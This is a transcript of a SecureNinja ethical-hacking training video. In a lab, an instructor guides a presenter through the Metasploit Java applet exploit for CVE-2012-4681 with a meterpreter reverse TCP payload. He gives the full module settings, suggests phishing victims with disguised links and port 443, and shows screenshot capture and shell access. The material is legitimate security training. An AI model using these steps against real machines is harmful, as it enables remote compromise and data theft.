Forging cyber security experts. Secure Ninja.
Hey everyone, I'm Alicia Webb with SecureNinjaTV. Now, our free preview of SecureNinja's online Sensei series has generated such a positive reaction that we've decided to give away every single module from the Cyber Kung Fu course, featuring Larry Greenblatt, Tom Updegrove, and me. If you like what you see and would like to experience a Secure Ninja training course in person at any of our training locations, we have some amazing time-sensitive specials for you. Just visit SecureNinja.com/specials for all of the do not miss deals. And now, here is your free module from Cyber Kung Fu for the Certified Ethical Hacker version 8. Enjoy.
Hi, welcome back to Module 12, Hacking Web Servers. That's actually Part 2. So what we're going to do here, Alicia, is actually it's not exactly hacking a web server. We're going to hack a web service. And it's actually an exploit in Java. It's been patched now, but it still is Java 7. And unless they're up to the latest patch, this exploit would work. And because Windows 8 is out in Server 2012, that's really run this against a new box. Okay, it's a fully patched Windows 8 machine, but it's running a slightly unpatched Java.
Okay.
So, and what we're going to use is our old friend Metasploit. So if you remember the command here, msf console.
Yep. msf console. Space?
No, all one word. Great. This thing takes a little bit of time to kind of pop up, but and in there, once it pops up, then we'll go into, we want to again search. You remember the terms, right? So search. We find the exploit that we want. We'll do a show options to see what options that particular exploit is going to use. We will usually set the remote host as to what we're attacking. We'll set the local host. This was going to actually create like a little web server. So another way of actually using Metasploit, just like we did with when we did our social engineering stuff. This will create a website, and again, we're going to send the link to someone and get them click on it. Okay? So in this case, I want you to search for 2012. There you go. I have to type in search. Yep. Yeah. Right, so space, right? So 2012 dash or hyphen. Just use your cursor. Yeah.
Not used to this hacker stuff.
Go over one more.
Bam.
There you go. All right. So hyphen. 4681.
4681.
Enter.
And that's the...
That's a search term for this particular exploit.
Okay.
And there it is. So what you have to do is highlight, I want you to highlight that whole exploit, multi-browser Java, JRE17EXE, and copy it. So right click on it. Now go use.
Right click.
You have to type use first.
Use.
Space. Now paste it in. You got to get your cursor in the window. Yeah. Go click once. Now right click. There you go.
I'm not even used to using PCs.
All right, hit enter.
All right.
It's okay. You're doing great. Okay, and we can see now that we particularly have that exploit up. Okay, so do show options. See, with this tool, when in doubt, always do a show options. So we have to set the SRV host, the SRV port, and the URI path. So the SRV host, again, what's our IP address of this machine?
It is 192.1.
You're going to have to, don't put the IP back in yet. So back up a little bit. All right, so go do an IF config just to make sure. All right, so scroll up. Scroll down, down. Okay, so I'm looking for 103. Good. The easiest way to get back, yeah, you go. So now what I want you to type is set SRV host. You missed the V. Space. Now the 192.168.56.103. So the whatever machine is going to click back, it needs to know that. All right, good. Hit enter. All right, that's good. So set SRV port. So it defaults to port 8080, but I want to make it simple. Space, make it 80. That way I don't have to add anything after the URI. Okay, hit enter. All right, set URI path. Just put a / enter. That just means that I don't have to do anything. Metasploit will create a just a random URI path, which is usually like X41YBQ, some crazy thing that you have to type in. So you could actually go add something there, say important documents or something like that. So that would be the IP address / important documents, and that would take them to it. Okay, good. We also need to set the local host. So set space lhost and make it the same address as the server. So 192.168.56.103. Good. Now we need a payload. You always need a payload with it. So do a show payloads. It's kind of interesting because it's a Java. We get a lot of different options, but we're going to use the interpreter this time. So we want to do the Java interpreter reverse TCP.
Would I copy this?
Yeah, no, go to one below it, where it says, yeah, that's it. That always copy that.
Copy that. Right click. Whoa. Reverse TCP.
Did you get the copy? All right, so you're going to, okay.
I did not.
Now, go set payload, space, and then paste that in. Let's see if it works. Yeah, super. Okay, so do another show options. Just to make sure we have everything kind of set. So we definitely have our lhost. We could change the port. You could, if I was actually doing this to something outside, I would change the port to 443. And you remember 443 is SSL, so on most web servers, that's always open. And, so it'd be a great one to use. Scroll up if you can a little bit. Did great, good. All right, so we can see that we have our server host set, we have the server port. We're not going to worry so much about SSL at this point, but if we were doing something that was HTTPS, we would have to set those. URI path is set to just a / so that there's nothing after the IP address. Okay, good. All right, so scroll down. Good. And on this one, hit exploit. All right, so we got the server started, and we can see that the IP address we have here. Now, I could take, now form an email, send that to someone that we wanted to actually, attack, someone we wanted to get control of the machine. I could obfuscate the IP address by creating a hyperlink, send that email to them, right? Have them click on it, and it would then point them back to the server that we're running. In our case, though, what we're going to do is we're going to go to a Windows 8 machine, so I happen to have a Windows 8 VM up here running. And now what we're going to do is just point back to that the server that we created. Great, so that guy's trying to connect. If we look back to the Metasploit, you can see that it actually made the connection, ran the, it actually sent the applet to it. It created an interpreter session. We can see that it's actually open, but we don't see like the shell and everything like we did before. Okay? Right. So what we do is we go sessions. We type this command sessions, and it's going to say actually okay, it's acting up. We actually have one session running. And that could have actually multiple sessions going. I have multiple people that I'm actually attacking going after here with this. But so if a second person clicked on it and a third person clicked on it, we pulled the phones up. And phones wouldn't quite do it the same way, but the concept, you know, is there. Right. So what we do is we go sessions and we do a -I, and then we put session number 1. And it actually now sets up this interpreter. And the interpreter is kind of interesting. So if I just go help, what it does is this tells me that all the different types of things I can do. So for instance, I can turn on the recording microphone. I can get a screenshot of it simply by typing screenshot. What it's going to do is it'll throw the screenshot into a folder. Okay. I can get a shell. I can list all the running processes. We can kind of do some of the same thing. I do an IP config. So in this case, let's say if I go screenshot.
Ooh, shoot.
It grabbed the screenshot and it put it into root JPEG. So if I go up here to my file browser, right? Go into root. There's a screenshot. If there was, there's actually nothing on the screen right now, but okay, we're in this box. I can now push over a Trojan. I can gain access. I can raise my my access up. The interesting thing is on this interpreter, I don't have all the same commands that I have sometimes with other types of exploits, and it's just some limitations in the development of this particular exploit. But basically, in fact, I go shell. Now I am in Windows 8. Again, I could go change directory, right, C. And I could start creating files in there, okay, like we did earlier with others.
You've been hacked folder,
right. So I could have some type of a TFTP server. I could copy files back and forth. That's pretty cool.
That is pretty cool.
And there you have it, hacking a web service, Java, on Windows 8.
Now we hope you've enjoyed this free module, but there's lots more. The Cyber Kung Fu course has 29 videos in all and will really help build you a solid understanding of the CEH version 8 curriculum. Don't forget, if you prefer to attend one of Secure Ninja's courses in person at any of our training locations, you really need to visit SecureNinja.com/specials for some amazing discounts and other deals. I'm Alicia Webb. Happy training.
Secure Ninja TV is brought to you by SecureNinja.com, a world leader in cybersecurity training and certification. Our master instructors will help build you into a highly skilled and marketable security professional. Secure Ninja, forging cybersecurity experts.